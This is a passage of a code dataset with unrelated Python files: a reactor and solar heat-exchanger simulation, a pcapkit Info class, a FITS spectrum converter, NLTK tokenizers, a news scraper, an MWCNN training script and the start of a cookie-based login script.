-(2*mdot_h*w*(T_ce-T_cine)/(m_c*T_ce))-(2*mdot_h*w*z_c/m_c)+(2*mdot_h*T_cine*u*w/(m_c*T_ce))\r\n \r\n derivs=[dydt1, dydt2, dydt3, dydt4]\r\n\r\n return derivs, p\r\n\r\ndef tempoutput(params2):\r\n c_pc,mdot_h,T_cine,a_f,h,finaltempchange = params2\r\n T_fe = T_cine+(1/(2*mdot_h*c_pc)+(1/h))*a_f*n_e #equillibrium of fuel temp\r\n T_ce = T_cine+(a_f*n_e/(2*mdot_h*c_pc)) #equillibrium of coolant temp\r\n Tout = (T_fe-T_ce)/(Rf*mdot_h*c_pc) + T_ce + finaltempchange\r\n power = mdot_h*c_pc*(Tout-T_cine)\r\n return Tout, power, T_cine, T_fe, T_ce\r\n\r\n\"\"\"takes data from the solar power data file for the mwe being produced by the solar power,\r\n the corresponding mass flow rate of the reactors heat exchanger on the cold side,\r\n and the reactivity table for ranging values of the power which change according to\r\n the amount of power being produced by the solar power data\"\"\"\r\n# \r\nMyData = pd.read_excel(\"Solar_Power_Data.xlsx\", sheet_name = \"CloudTransient(SolP)\") #extracting values of solar power generated in 10 min steps\r\n#MyData1 = pd.read_excel(\"C:/Users/Yugi/Documents/Senior Design 2/Solar_Power_Data.xlsx\", sheet_name = \"Sheet4\")#extracting values of reactivity inserted for corresponding solar power 10 min steps\r\nMyData2 =pd.read_excel(\"Solar_Power_Data.xlsx\", sheet_name = \"CloudTransient(ReactorM)\")# extracting mass flow rate values for each 10 min cycle on the cold side of the heat exchanger\r\nMyData3 =pd.read_excel(\"Solar_Power_Data.xlsx\", sheet_name = \"CloudTransient(SolM)\")\r\ndf = MyData.values.tolist()\r\n#df1 = MyData1.values.tolist()\r\ndf2 = MyData2.values.tolist()\r\ndf3 = MyData3.values.tolist()\r\n#\r\nmergedf = list(itertools.chain.from_iterable(df))\r\n#mergedf1 =list(itertools.chain.from_iterable(df1))\r\nmergedf2 = list(itertools.chain.from_iterable(df2))\r\nmergedf3 = list(itertools.chain.from_iterable(df3))\r\n#\r\nSolarPower = mergedf[0:90]\r\n#Reactivity =mergedf1[3:80:5]\r\nmdot_cA =mergedf2[0:90]\r\nmdot_solar = mergedf3[0:90]\r\n\r\nfor j in range(90):\r\n\r\n# if SolarPower[j] < 50:\r\n# n_e = 230.05 \r\n# if 50 <= SolarPower[j] <100: \r\n# deln_e = 172.25*(Reactivity[0]**2) +204.19*Reactivity[0]+0.0517\r\n# n_e =200 + deln_e\r\n# if 100 <=SolarPower[j] <150:\r\n# deln_e = 172.25*(Reactivity[1]**2) +204.19*Reactivity[1]+0.0517\r\n# n_e =200 + deln_e \r\n# if 150 <= SolarPower[j] <200:\r\n# deln_e = 172.25*(Reactivity[2]**2) +204.19*Reactivity[2]+0.0517\r\n# n_e =200 + deln_e \r\n# if 200 <= SolarPower[j] <250:\r\n# deln_e = 172.25*(Reactivity[3]**2) +204.19*Reactivity[3]+0.0517\r\n# n_e =200 + deln_e \r\n# if 250 <= SolarPower[j] < 300:\r\n# deln_e = 172.25*(Reactivity[4]**2) +204.19*Reactivity[4]+0.0517\r\n# n_e =200 + deln_e \r\n# if 300 <= SolarPower[j] <350:\r\n# deln_e = 172.25*(Reactivity[5]**2) +204.19*Reactivity[5]+0.0517\r\n# n_e =200 + deln_e \r\n# if 350 <= SolarPower[j] <400:\r\n# deln_e = 172.25*(Reactivity[6]**2) +204.19*Reactivity[6]+0.0517\r\n# n_e =200 + deln_e \r\n# if 400<= SolarPower[j] < 450:\r\n# deln_e = 172.25*(Reactivity[7]**2) +204.19*Reactivity[7]+0.0517\r\n# n_e =200 + deln_e \r\n# if 450<= SolarPower[j] < 500:\r\n# deln_e = 172.25*(Reactivity[8]**2) +204.19*Reactivity[8]+0.0517\r\n# n_e =200 + deln_e \r\n# if 500 <= SolarPower[j] < 550:\r\n# deln_e = 172.25*(Reactivity[9]**2) +204.19*Reactivity[9]+0.0517\r\n# n_e =200 + deln_e \r\n# if 550<= SolarPower[j] < 600:\r\n# deln_e = 172.25*(Reactivity[10]**2) +204.19*Reactivity[10]+0.0517\r\n# n_e =200 + deln_e \r\n# if 600 <= SolarPower[j] <=700:\r\n# deln_e = 172.25*(Reactivity[11]**2) +204.19*Reactivity[11]+0.0517\r\n# n_e =200 + deln_e \r\n \r\n if mdot_solar[j] < 90:\r\n deln_e = -117\r\n n_e = 200 +deln_e\r\n if 90 <= mdot_solar[j] <195: \r\n deln_e = -127\r\n n_e =200 + deln_e\r\n if 195 <= mdot_solar[j] <295: \r\n deln_e = -135\r\n n_e =200 + deln_e \r\n if 295 <=mdot_solar[j] <395:\r\n deln_e = -142\r\n n_e =200 + deln_e \r\n if 395<= mdot_solar[j] <495:\r\n deln_e = -155\r\n n_e =200 + deln_e \r\n if 495 <= mdot_solar[j]<595:\r\n deln_e = -160\r\n n_e =200 + deln_e \r\n if 595 <= mdot_solar[j] < 695:\r\n deln_e = -167\r\n n_e =200 + deln_e \r\n if 695 <= mdot_solar[j] <795:\r\n deln_e = -175\r\n n_e =200 + deln_e \r\n if 795 <= mdot_solar[j] <850:\r\n deln_e = -175\r\n n_e =200 + deln_e \r\n if 850 <= mdot_solar[j] <895:\r\n deln_e = -190\r\n n_e =200 + deln_e \r\n if 895 <= mdot_solar[j]<995:\r\n deln_e = -191\r\n n_e =200 + deln_e \r\n '''Initial parameters of the core'''\r\n PebbleN = 441000 # number of pebbles in core\r\n alpha=0.001\r\n lamb=0.1\r\n beta=7.5*10**-3\r\n c_pf=717 #specific heat of graphite moderator\r\n c_pc=2414.7 #specific heat of FliBE\r\n m_f=PebbleN*(1.5/1000) #mass of u235 in 470,000 pellets\r\n m_c=90830.8 #mass of coolant\r\n a_f=7.0e6\r\n alpha_f=-5.4e-6 #Change in reactivity based on temp of fuel\r\n alpha_c=-1.8e-5 #Change in reactivity based on temp for moderator\r\n Rf = .0005 #fouling factor \r\n \r\n params=[alpha,lamb,beta,c_pf,c_pc,m_f,m_c,mdot_h,T_cine,a_f,n_e,alpha_f,alpha_c,h]\r\n x0=0.0 #starting neutron pop\r\n y0=0.0 #starting precursors\r\n z_f0=1.0 #starting fuel temp try changing to 0\r\n z_c0=1.0 #starting moderator temp\r\n y0=[x0,y0,z_f0,z_c0]\r\n t0=0\r\n A=[]\r\n \r\n # Solver\r\n r = ode(dydt).set_integrator('dopri5', method='nsteps')\r\n r.set_initial_value(y0, t0).set_f_params(params)\r\n '''run each cycle for an arbitrary volume of fluid over 1 minute through 1 cycle'''\r\n t1 =1.0\r\n dt = 0.01\r\n T=[]\r\n while r.successful() and r.t < t1:\r\n r.integrate(r.t+dt)\r\n T=np.append(T,r.t)\r\n A=np.append(A,r.y)\r\n #print np.size(A)\r\n B= A.reshape(np.size(T),4)\r\n \r\n finaltempchange = sum(B[:,3])\r\n \"\"\" these append the values of needed variables after each ten minute cycle\"\"\" \r\n params2 = [c_pc,mdot_h,T_cine,a_f,h,finaltempchange] \r\n Power.append(tempoutput(params2)[1]/1e6)\r\n Powere.append(tempoutput(params2)[1]/(1e6*2.222))\r\n FuelT.append(tempoutput(params2)[3])\r\n InletTemp.append(tempoutput(params2)[2])\r\n finaltemps.append(tempoutput(params2)[0])\r\n MdotO.append(mdot_h)\r\n Htransfer.append(h)\r\n NeutronD.append(B[:,0])\r\n '''Solving for the velocity, Total Heat transfer ocefficinet in the core, \r\n and mass flow rate of the reactor''' \r\n \r\n\r\n Vavg = math.sqrt((g*b*Hreflector[9]**2*(finaltemps[j]-T_cine)*rho_h*ACore*u0)/(Hreflector[9]*(1+K+(F1*Hreflector[9]/PebbleD)))) # average velocity through core solving continuity equation w/ assumptions\r\n \r\n Recore = (Vavg*PebbleD*rho_h)/(mu_h) #Re number through porous bed\r\n Prcore = (mu_h*c_ph)/k_h # the prandtl number of the coolant\r\n Nucore = 2+1.1*(Prcore**(1/3))*(Recore**(.6)) # nusselt value for Re>50 por=.35-.4\r\n h_FLiBe = (6*(1-porosity)*k_h*Nucore*TotSurf)/PebbleD # W/(K)Thermal convection Coefficient\r\n h=h_FLiBe #setting H value in ODE to the h value determined from fluid mechanics\r\n mdot_h= Vavg*rho_h*Aout #mass flow rate in kg/s \r\n \r\n V.append(Vavg)\r\n \r\n \"\"\"Setting the input and output temperatures of the cold side heat exchanger\"\"\"\r\n T_h_in= finaltemps[j] #ALL TEMPERATURES LISTED IN KELVIN, K \r\n T_c_in= 450\r\n T_c_out= 700\r\n \r\n \r\n #FLUID PROPERTIES -- FLiBe (shellside hot)\r\n \r\n rho_h= 2518-0.406*(T_h_in+T_c_in)/2 #density in kg/m^3\r\n mu_h= 0.000116*np.exp(3755/((T_h_in+T_c_in)/2)) #viscosity in Pa*s\r\n c_ph= 2415.78 #specific heat in J/kg*K\r\n k_h= 0.629697+0.0005*((T_h_in+T_c_in)/2) #thermal conductivity in W/mK\r\n b = 1/T_cine\r\n \r\n ''' Gives the pressure drop and velocity profile over each cycle'''\r\n DelP = (rho_h/2)*(Vavg**2 - u0**2) + rho_h*g*Hreflector[9] - rho_h*(1-b*(finaltemps[j]-T_cine))\r\n F1 = (DelP/Hreflector[9])*(PebbleD**2/Vavg**2)*(porosity**3/(1-porosity)**2)\r\n Delp.append(DelP)\r\n# for i in range(9):\r\n# Vh = math.sqrt((g*b*Hreflector[i]**2*(finaltemps[j]-T_cine)*rho_h*ACore*u0)/(Hreflector[i]*(1+K+((DelP/Hreflector[i])*(PebbleD**2/Vavg**2)*(porosity**3/(1-porosity)**2)*Hreflector[i]/PebbleD)))) # average velocity through core solving continuity equation w/ assumptions\r\n# Vprofile.append(Vh)\r\n \r\n CHOICE= 1\r\n #FLUID PROPERTIES -- Solar Salt (tubeside cold)\r\n \r\n rho_c= 1804\r\n mu_c= 0.00169\r\n c_pc= 1520 \r\n k_c= 0.53\r\n Pr_c= 4.85\r\n \r\n #TUBE PROPERTIES \r\n \r\n d_o= 0.02 #outer tube diameter in m \r\n t_w= 0.001 #tube wall thickness \r\n d_i= d_o-2*t_w #inner tube diameter \r\n \r\n #GUESSES \r\n \r\n U= 100\r\n U_guess= 200 #Overall HT Coefficient in W/m^2*K\r\n v_tube_guess= 1.5 #Tube velocity in m/s \r\n #Energy Balance \r\n \"\"\" setting values of the cold side heat exchanger mass flow rate\"\"\"\r\n #mass flow rate in kg/s \r\n mdot_c=mdot_cA[j]\r\n Qdot= (mdot_cA[j])*c_pc*(T_c_out-T_c_in)\r\n T_h_out= T_h_in-mdot_c*c_pc*(T_c_out-T_c_in)/(mdot_h*c_ph)\r\n T_cine = T_h_out\r\n Q.append(Qdot)\r\n\r\n#Vprof= np.reshape(Vprofile, (145,9)).T\r\n#Vprof1 = Vprof[0:120:1]\r\n#Vprof2 = Vprof[0:120:1]\r\n#Vprof3 = Vprof[0:120:1]\r\n#Vprof4 = Vprof[0:120:1]\r\n#Vprof5 = Vprof[0:120:1]\r\n#Vprof6 = Vprof[0:120:1]\r\n#Vprof7 = Vprof[0:120:1]\r\n#Vprof8 = Vprof[0:120:1]\r\n#Vprof9 = Vprof[0:120:1]\r\n#Vprof10 = Vprof[0:120:1]\r\n#Vprof11 = Vprof[0:120:1]\r\n#Vprof12 = Vprof[0:120:1]\r\n#Vprof13 = Vprof[0:120:1]\r\n\r\nnp.savetxt(\"Solar.csv\", mdot_solar) \r\nnp.savetxt(\"Reactor.csv\", mdot_cA) \r\n\r\n'''plotting the inlet and outlet temperature of the reactor according to changes in power and mass flow rate'''\r\nplt.figure(1) \r\nplt.plot(InletTemp, label = 'Inlet') \r\nplt.plot(finaltemps, label = 'Outlet')\r\nplt.xlabel('Cycles')\r\nplt.ylabel('Temperature(Kelvin)')\r\nplt.title('Inlet & Outlet Temperature of Reactor')\r\nax = plt.subplot(111) \r\nax.legend()\r\n'''plotting the power change over each cycle of 20 minutes'''\r\nplt.figure(2) \r\nplt.plot(Power, label= ' Reactor(MWth)')\r\nplt.plot(SolarPower, label= ' Solar(MWe)')\r\nplt.xlabel('Cycles=(10min/cycle)')\r\nplt.ylabel('Power(MW)')\r\nplt.title('Power')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\"\"\"plots the average mass flow rate in the core\"\"\"\r\nplt.figure(3) \r\nplt.plot(MdotO, label= 'Reactor ')\r\nplt.plot(mdot_solar, label='Solar')\r\nplt.plot(mdot_cA, label = 'Reactor IHE' )\r\nplt.xlabel('Cycles')\r\nplt.ylabel('mdot(kg/s)')\r\nplt.title('Mass Flow rate')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\"\"\"plots the heat transfer coefficient in the core\"\"\"\r\nplt.figure(4) \r\nplt.plot(Htransfer, label= 'Reactor H')\r\nplt.xlabel('Cycles')\r\nplt.ylabel('h(W/K)')\r\nplt.title('Heat transfer coeff. for Total Surface Area')\r\nax = plt.subplot(111) \r\nax.legend()\r\n#\"\"\"plots the normalized neutron density in the core\"\"\"\r\n#plt.figure(5) \r\n#plt.plot(NeutronD, label= 'Normalized neutron Density')\r\n#plt.xlabel('Cycles')\r\n#plt.ylabel('X0')\r\n#plt.title('Neutron Density')\r\n#ax = plt.subplot(111) \r\n#ax.legend()\r\n\"\"\" plots the heat transfer of the intermediate heat exchanger attatched to thermal energy storage system\"\"\"\r\nplt.figure(6) \r\nplt.plot(Q, label= 'IHE heat tansfer')\r\nplt.xlabel('Cycles')\r\nplt.ylabel('Q(W)')\r\nplt.title('Heat Transferred from IHE into TES')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\"\"\"plots the velocity profile of the core for each cycle\"\"\"\r\nplt.figure(7) \r\nplt.plot(V, label= 'Average Velocity')\r\nplt.xlabel('24 hours(1 min interval)')\r\nplt.ylabel('V(m/s)')\r\nplt.title('Velocity inside Reactor')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\r\n#plt.figure(8) \r\n#plt.plot(Vprof)\r\n#plt.xlabel('axial profile over H=3(m)')\r\n#plt.ylabel('V(m/s)')\r\n#plt.title('Velocity in Reactor over 24 hours')\r\n#ax = plt.subplot(111) \r\n#ax.legend()\r\n\"\"\"plots the pressure drop along the reactor core\"\"\"\r\nplt.figure(9) \r\nplt.plot(Delp, label= 'pressure drop')\r\nplt.xlabel('cycles')\r\nplt.ylabel('DelP(Pa)')\r\nplt.title('Pressure drop inside of reactor Core')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\r\n\"\"\"plots the equilibrium fuel temperature of the core\"\"\"\r\nplt.figure(10) \r\nplt.plot(FuelT, label= 'Fuel Temp.')\r\nplt.xlabel('cycles')\r\nplt.ylabel('Temperature(kelvin)')\r\nplt.title('Equilibrium Fuel Temp. of Reactor')\r\nax = plt.subplot(111) \r\nax.legend()","sub_path":"system/Woody_CloudTransientControl.py","file_name":"Woody_CloudTransientControl.py","file_ext":"py","file_size_in_byte":16947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"361531837","text":"# -*- coding: utf-8 -*-\n\"\"\"info class\n\n:mod:`pcapkit.corekit.infoclass` contains :obj:`dict` like class\n:class:`~pcapkit.corekit.infoclass.Info` only, which is originally\ndesigned to work alike :func:`dataclasses.dataclass` as introduced\nin :pep:`557`.\n\n\"\"\"\nimport collections.abc\nimport copy\n\nfrom pcapkit.utilities.exceptions import UnsupportedCall\nfrom pcapkit.utilities.validations import dict_check\n\n__all__ = ['Info']\n\n\nclass Info(collections.abc.Mapping):\n \"\"\"Turn dictionaries into :obj:`object` like instances.\n\n Notes:\n * :class:`Info` objects inherit from :obj:`dict` type\n * :class:`Info` objects are *iterable*, and support all functions as :obj:`dict`\n * :class:`Info` objects are **one-time-modeling**, thus cannot set or delete\n attributes after initialisation\n\n \"\"\"\n\n def __new__(cls, dict_=None, **kwargs):\n \"\"\"Create a new instance.\n\n Args:\n dict_ (Dict[str, Any]): Source :obj:`dict` data.\n\n Keyword Args:\n **kwargs: Arbitrary keyword arguments.\n\n Notes:\n Keys with the same names as the builtin methods will be renamed\n with ``2`` suffix implicitly and internally.\n\n \"\"\"\n def __read__(dict_):\n __dict__ = dict()\n for (key, value) in dict_.items():\n if key in self.__data__:\n key = f'{key}2'\n if isinstance(value, dict):\n __dict__[key] = Info(value)\n else:\n # if isinstance(key, str):\n # key = re.sub(r'\\W', '_', key)\n __dict__[key] = value\n return __dict__\n\n temp = list()\n for obj in cls.mro():\n temp.extend(dir(obj))\n cls.__data__ = set(temp)\n\n self = super().__new__(cls)\n if dict_ is not None:\n if isinstance(dict_, Info):\n self = copy.deepcopy(dict_)\n else:\n dict_check(dict_)\n self.__dict__.update(__read__(dict_))\n\n self.__dict__.update(__read__(kwargs))\n return self\n\n def __str__(self):\n temp = list()\n for (key, value) in self.__dict__.items():\n temp.append(f'{key}={value}')\n args = ', '.join(temp)\n return f'Info({args})'\n\n def __repr__(self):\n temp = list()\n for (key, value) in self.__dict__.items():\n if isinstance(value, Info):\n temp.append(f'{key}=Info(...)')\n else:\n temp.append(f'{key}={value!r}')\n args = ', '.join(temp)\n return f\"Info({args})\"\n\n def __len__(self):\n return len(self.__dict__)\n\n def __iter__(self):\n return iter(self.__dict__)\n\n def __getitem__(self, key):\n if key in self.__data__:\n key = f'{key}2'\n value = self.__dict__[key]\n if isinstance(value, (dict, collections.abc.Mapping)):\n return Info(value)\n return value\n\n def __setattr__(self, name, value):\n raise UnsupportedCall(\"can't set attribute\")\n\n def __delattr__(self, name):\n raise UnsupportedCall(\"can't delete attribute\")\n\n def info2dict(self):\n \"\"\"Convert :class:`Info` into :obj:`dict`.\n\n Returns:\n Dict[str, Any]: Converted :obj:`dict`.\n\n \"\"\"\n dict_ = dict()\n for (key, value) in self.__dict__.items():\n if isinstance(value, Info):\n dict_[key] = value.info2dict()\n elif isinstance(value, (tuple, list, set, frozenset)):\n temp = list()\n for item in value:\n if isinstance(item, Info):\n temp.append(item.info2dict())\n else:\n temp.append(item)\n dict_[key] = value.__class__(temp)\n else:\n dict_[key] = value\n return dict_\n","sub_path":"pcapkit/corekit/infoclass.py","file_name":"infoclass.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"396194576","text":"from __future__ import print_function\nfrom astropy.io import fits\nimport numpy as np\nimport os\nimport csv\nimport sys\n\n\ndef fitstotxt(target, filepath, writepath, xmin, xmax):\n \"\"\"\n Reads a FITS file, applies barycentric and cloud corrections\n and writes a subsection within a given range to a .txt file.\n\n input:\n sightline\n path/to/fits/database/\n path/to/write/folder\n range max\n range min\n\n output:\n .txt file of spectrum within given range, tab separated, in a given folder.\n\n example output:\n\n # HD144470\n # Wavelength(1/cm) Relative Intensity\n 3303.1797537322504 1.0084753\n 3303.199755852153 1.0125096\n 3303.219757972055 1.012984\n 3303.2397600919576 1.0122045\n\n example:\n\n fitstotxt('HD144470', '/data/DR3_fits/', '/home/txtfiles/, 6610, 6618)\n\n \"\"\"\n\n c = 2.99 * (10 ** 8) # m/s\n\n arms = [\"BLUE_346\", \"BLUE_437\", \"REDL_564\", \"REDU_564\", \"REDL_860\", \"REDU_860\"]\n\n if xmin <= 3876:\n l1 = 0\n if xmin <= 4990 and xmin >= 3754:\n l1 = 1\n if xmin <= 5667.9 and xmin >= 4616:\n l1 = 2\n if xmin <= 6693.9 and xmin >= 5668:\n l1 = 3\n if xmin <= 8649.9 and xmin >= 6694:\n l1 = 4\n if xmin >= 8650:\n l1 = 5\n\n if xmax <= 3876:\n l2 = 0\n if xmax <= 4990 and xmax >= 3754:\n l2 = 1\n if xmax <= 5667.9 and xmax >= 4616:\n l2 = 2\n if xmax <= 6693.9 and xmax >= 5668:\n l2 = 3\n if xmax <= 8649.9 and xmax >= 6694:\n l2 = 4\n if xmax >= 8650:\n l2 = 5\n\n if l1 == l2:\n warm = [arms[l1]]\n if l1 != l2:\n warm = arms[l1:l2]\n\n for i in range(len(warm)):\n os.chdir(filepath)\n loc = filepath + target + \"/\" + warm[i] + \"/\"\n if warm[i] == \"REDL_564\" or warm[i] == \"REDU_564\":\n loc = filepath + target + \"/RED_564\" + \"/\"\n if warm[i] == \"REDL_860\" or warm[i] == \"REDU_860\":\n loc = filepath + target + \"/RED_860\" + \"/\"\n\n if os.path.isdir(loc) is False:\n print(\"This object have not been observed yet!\")\n return ()\n os.chdir(loc)\n\n # Min and Max values used in order to shift based on interstellar NaI\n\n NaIxmin = 3301.0\n NaIxmax = 3305.0\n # NaIxmin = 5895\n # NaIxmax = 5897.5\n\n # ymin = 0.5\n # ymax = 1\n\n lambda_res = 3302.8\n # lambda_res = 5897.5\n\n # first_peak_index = []\n # second_peak_index = []\n # third_peak_index = []\n visible_x = []\n x_to_plot = []\n visible_y = []\n y_to_plot = []\n points = []\n DIB_x = []\n DIB_y = []\n\n # file_list = [os.path.basename(q) for q in glob.glob(path + '*.fits')]\n path = loc\n file_list = os.listdir(path)\n\n for file_number in range(len(file_list)):\n\n file_name = file_list[file_number]\n\n if file_name.split(\".\")[-2] == \"fits\":\n\n hdulist = fits.open(path + file_name)\n hdu = hdulist[0]\n data_towork = hdu.data\n first_val = hdu.header[\"CRVAL1\"]\n stepsize = hdu.header[\"CDELT1\"]\n final_val = first_val + (stepsize * len(data_towork))\n x = np.linspace(first_val, final_val, len(data_towork))\n bcf = hdu.header[\"HIERARCH ESO QC VRAD BARYCOR\"]\n\n # Analyze the NaI lines to get the proper shift\n for i in range(0, len(data_towork)):\n if NaIxmin <= x[i] <= NaIxmax:\n visible_x.append(x[i])\n visible_y.append(data_towork[i])\n if xmin <= x[i] <= xmax:\n DIB_x.append(x[i])\n DIB_y.append(data_towork[i])\n else:\n continue\n\n if len(visible_x) == 0:\n continue\n else:\n x_to_plot.extend(visible_x)\n y_to_plot.extend(visible_y)\n\n for j in range(0, len(x_to_plot)):\n point = (((x_to_plot[j])), (y_to_plot[j]))\n points.append(point)\n points.sort()\n\n bary_corr = 1 + (bcf / c)\n\n xpoint = [x[0] for x in points]\n ypoint = [y[1] for y in points]\n lowest_min = np.argmin(ypoint / max(ypoint))\n lambda_obs = xpoint[lowest_min]\n cloud_vel = c * (lambda_obs - lambda_res) / lambda_res\n cloud_vel_corr = 1 - (cloud_vel / c)\n\n # correction for wavelenth taking into account barycentric velocity and cloud velocity.\n total_wavelength_correction = bary_corr * cloud_vel_corr\n\n # Scale the data in order to view desired DIB\n\n DIB_plot_x = [total_wavelength_correction * x_val for x_val in DIB_x]\n DIB_plot_y_1 = [(y / max(DIB_y)) for y in DIB_y]\n a = np.mean(DIB_plot_y_1[:25])\n DIB_plot_y = DIB_plot_y_1 / a\n NaI_plot_x = [total_wavelength_correction * x_val for x_val in xpoint]\n NaI_plot_y = [y / max(ypoint) for y in ypoint]\n\n # write to .txt file\n os.chdir(writepath)\n f = open(target + \"_subrange.txt\", \"w+\")\n f.write(\"# \" + target)\n f.write(\"\\n\")\n title = \"# Wavelength(1/cm) Relative Intensity \\n\"\n f.write(title)\n\n writer = csv.writer(f, delimiter=\"\\t\")\n writer.writerows(zip(DIB_plot_x, DIB_plot_y))\n\n f.close()\n\n\n# fullCmdArguments = sys.argv\n# args = fullCmdArguments[1:]\n# arN = len(sys.argv)\n\n# print(args)\n# if len(args) != 5:\n# print('\\nSyntax: python fitsto2dtxt.py target, filepath, writepath, xmin, xmax\\n')\n\n# else:\n# fitstotxt(args[0], args[1], args[2], args[3], args[4])\n","sub_path":"edibles/utils/old/fitsto2dtxt.py","file_name":"fitsto2dtxt.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"563901176","text":"import sys\nimport nltk\nimport re\nfrom nltk.tokenize import word_tokenize\nfrom nltk import sent_tokenize\n\ninfile = sys.argv[1]\noutfile = sys.argv[2]\n\ndef my_sent_tokenizer(infile, outfile):\n\n '''open file and turn it into a string'''\n\n with open(infile, 'r') as myfile:\n\n read_string = myfile.read()\n\n sentences = sent_tokenize(read_string)\n\n dataset = open(outfile, 'w')\n\n for i in sentences:\n\n dataset.write(i+'\\n')\n\n dataset.close()\n\ndef my_word_tokenizer(infile, outfile):\n\n with open(infile, 'r') as worktext:\n\n\n # read_text = worktext.read()\n with open(outfile, 'w') as tokens:\n for sent in worktext:\n sent = word_tokenize(sent)\n for i in sent:\n tokens.write(i+' ')\n tokens.write('\\n')\n\n\ndef data_cleanup(dataset, output):\n with open(dataset, 'r')as datatext:\n read = set(datatext.readlines())\n print(type(read), len(read))\n\n with open(output, 'w') as outfile:\n # lines =[]\n\n for line in read:\n line = re.sub(r'[\\(\\)\\[\\]\\-\\:\\;\\d]','',line)\n line = re.sub(r'\\.\\.\\.','.', line)\n line = re.sub(r'\\bhttps?\\/\\/.*[\\r\\n]*', '', line)\n line = re.sub(r'\\= \\.', '', line)\n line = re.sub(r'[%+≤-]','',line)\n line = re.sub(r'([\\,\\.]) [\\.\\,]+', '\\1', line)\n line = re.sub(r'\\s*\\-\\.\\s*','', line)\n line = re.sub(r'', '', line)\n\n if len(line)>10:\n\n outfile.write(line)\n\n outfile.close()\n\n\n# my_sent_tokenizer(infile, outfile)\n# my_word_tokenizer(infile, outfile)\ndata_cleanup(infile, outfile)\n","sub_path":"tokenizer_simplestyle.py","file_name":"tokenizer_simplestyle.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"65002995","text":"import urllib2\nfrom bs4 import BeautifulSoup as BS\n\ndef getOnlyTextWP(url):\n # Uses urllib to download html page and BS to scrape out the text we want\n page = urllib2.urlopen(url).read().decode('utf8')\n # open the page\n soup = BS(page, 'html.parser')\n # dump the contents to the page\n text = ' '.join(map(lambda p: p.text, soup.find_all('article')))\n # use the code to get all the text that lies between the
stuff
\n # HTML tags. This is specific to the URL here (Washington Post) and will change\n # depending on the website.\n soup2 = BS(text, 'html.parser')\n # Now that we have the article. Pare this down to the actual text between the \n #

paragraph tags. Again, this is dependent on the website's conventions.\n text = ' '.join(map(lambda p: p.text, soup2.find_all('p')))\n return soup.title.text, text\n # This will take a URL that corresponds to the following format:\n # Article Headline \n # [stuff]

para 1

para 2

\n # \n # This function should return a pair ('Article Headline', 'para 1 para 2')\n \nsomeUrl = \"https://www.washingtonpost.com/news/worldviews/wp/2016/11/08/in-rare-blast-at-british-media-prince-harry-says-his-american-girlfriend-meghan-markle-faces-wave-of-abuse/?hpid=hp_hp-more-top-stories_wv-harry-850am%3Ahomepage%2Fstory\"\ntextOfUrl = getOnlyTextWP(someUrl)\nprint(textOfUrl)","sub_path":"2.7/natural_language_004.py","file_name":"natural_language_004.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"252769101","text":"import argparse\r\nfrom glob import glob\r\n\r\nimport tensorflow as tf\r\nimport math\r\nfrom train_MWCNN import *\r\nfrom utils_py3_tfrecord_2 import *\r\nfrom config import *\r\n\r\n#weigth decay momentum optimizer\r\n#L2 regularization\r\n#tensorboard\r\n\r\n\r\nif __name__ == '__main__':\r\n print(tf.executing_eagerly())\r\n physical_devices = tf.config.experimental.list_physical_devices('GPU') \r\n try: \r\n tf.config.experimental.set_memory_growth(physical_devices[0], True) \r\n assert tf.config.experimental.get_memory_growth(physical_devices[0]) \r\n except: \r\n # Invalid device or cannot modify virtual devices once initialized. \r\n pass\r\n\r\n #read dataset\r\n train_dataset = read_and_decode('./patches/MWCNN_train_data.tfrecords')\r\n val_dataset = read_and_decode('./patches/MWCNN_validation_data.tfrecords')\r\n #build model\r\n model = MWCNN()\r\n #set up optimizer\r\n optimizer = tf.optimizers.Adam(learning_rate=0.01, epsilon=1e-8, name='AdamOptimizer')\r\n\r\n writer = tf.summary.create_file_writer('./logs/'+ datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\r\n ckpt = tf.train.Checkpoint(step=tf.Variable(1), optimizer = optimizer, net = model)\r\n manager = tf.train.CheckpointManager(ckpt, checkpoint_directory, max_to_keep=None)\r\n\r\n #checkpoint restortion\r\n ckpt.restore(manager.latest_checkpoint)\r\n if manager.latest_checkpoint:\r\n print(\"Restored from {}\".format(manager.latest_checkpoint))\r\n start_epoch = ckpt.save_counter.numpy() + 1\r\n else:\r\n print(\"Initializing from scratch.\")\r\n start_epoch = 1\r\n\r\n for epoch in range(start_epoch, epochs+1):\r\n print('Start of epoch %d' % (epoch,))\r\n optimizer.learning_rate = decay_lr[epoch]\r\n train_one_epoch(model, train_dataset, optimizer, writer, ckpt)\r\n evaluate_model(model, val_dataset, writer, epoch)\r\n # save the checkpoint in every epoch\r\n save_path = manager.save()\r\n print(\"Saved checkpoint for epoch {}: {}\".format(int(epoch), save_path))\r\n\r\n print(\"Training saved\")\r\n","sub_path":"MWCNN/main_py3_tfrecord_MWCNN.py","file_name":"main_py3_tfrecord_MWCNN.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"305794224","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport urllib\nimport urllib2\nimport cookielib\n\n\ndef login():\n \"\"\"\n 登录模块,产生可以保存Cookie的opener对象\n \"\"\"\n # 1. 创建保存Cookie的cookiejar对象\n cookie_jar = cookielib.CookieJar()\n # 2. 使用Cookiejar对象,构建hanlder处理器\n cookie_handler = urllib2.HTTPCookieProcessor(cookie_jar)\n # 3. 再通过handler处理器,构建自定义opener对象\n opener = urllib2.build_opener(cookie_handler)\n\n # 登录post请求的url地址\n login_url = \"http://www.renren.com/PLogin.do\"\n # 构建表单数据\n form_data = {\"email\" : 